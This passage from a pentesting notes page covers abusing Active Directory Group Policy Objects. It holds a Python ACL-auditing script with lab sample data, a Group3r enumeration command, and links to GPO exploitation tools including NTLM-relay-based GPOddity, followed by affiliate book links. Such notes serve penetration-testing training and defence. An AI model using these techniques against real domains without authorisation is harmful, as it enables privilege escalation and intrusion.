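        rights = [r for r in decode_access_mask(ace["AccessMask"]) if RIGHTS[r] & WRITE_RIGHTS]
        report.append(f"{who} has {', '.join(rights)} on {ace['ObjectDN']}")
    return report

# Constructed from the page's Get-ObjectAcl output (DN, SID and mask 983095 are from the page).
GPO_DN = "CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"
SAMPLE_ACES = [
    {"ObjectDN": GPO_DN, "AceQualifier": "AccessAllowed", "AccessMask": 983095,
     "SecurityIdentifier": DOMAIN_SID + "-513"},   # Domain Users: the page's finding
    {"ObjectDN": GPO_DN, "AceQualifier": "AccessAllowed", "AccessMask": 0x20014,
     "SecurityIdentifier": "S-1-5-11"},            # Authenticated Users, read-only
    {"ObjectDN": GPO_DN, "AceQualifier": "AccessAllowed", "AccessMask": 0xF01FF,
     "SecurityIdentifier": DOMAIN_SID + "-512"},   # Domain Admins: expected to hold full control
]

if __name__ == "__main__":
    print("983095 ->", ", ".join(decode_access_mask(983095)))
    for line in risky_gpo_aces(SAMPLE_ACES):
        print("[!]", line)
```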

### Exploit Tools - GPOAbuse

{% embed url="<https://github.com/FSecureLABS/SharpGPOAbuse>" %}

{% embed url="<https://github.com/Hackndo/pyGPOAbuse>" %}

### Group3r

{% embed url="<https://github.com/Group3r/Group3r>" %}

```cmd-session
C:\htb> group3r.exe -f <filepath-name.log> 
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F3WsGgWwT0JoAO9vlFKOp%2FPasted%20image%2020240513061123.png?alt=media&#x26;token=e1f97259-6853-45d3-aa3a-7c94aa0b8892" alt=""><figcaption></figcaption></figure>

GUI for Group3r:

{% embed url="<https://github.com/sap8899/Group3rExplorer>" %}

### GPOddity - Exploit GPO through NTLM relay

{% embed url="<https://github.com/synacktiv/GPOddity>" %}

{% embed url="<https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more>" %}

### Resources

{% embed url="<https://beta.hackndo.com/gpo-abuse-with-edit-settings/>" %}

## Interesting Book

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}

* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
  Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
  Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
  A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
  The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
  A practical guide to building a penetration testing program having homefield advantage

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
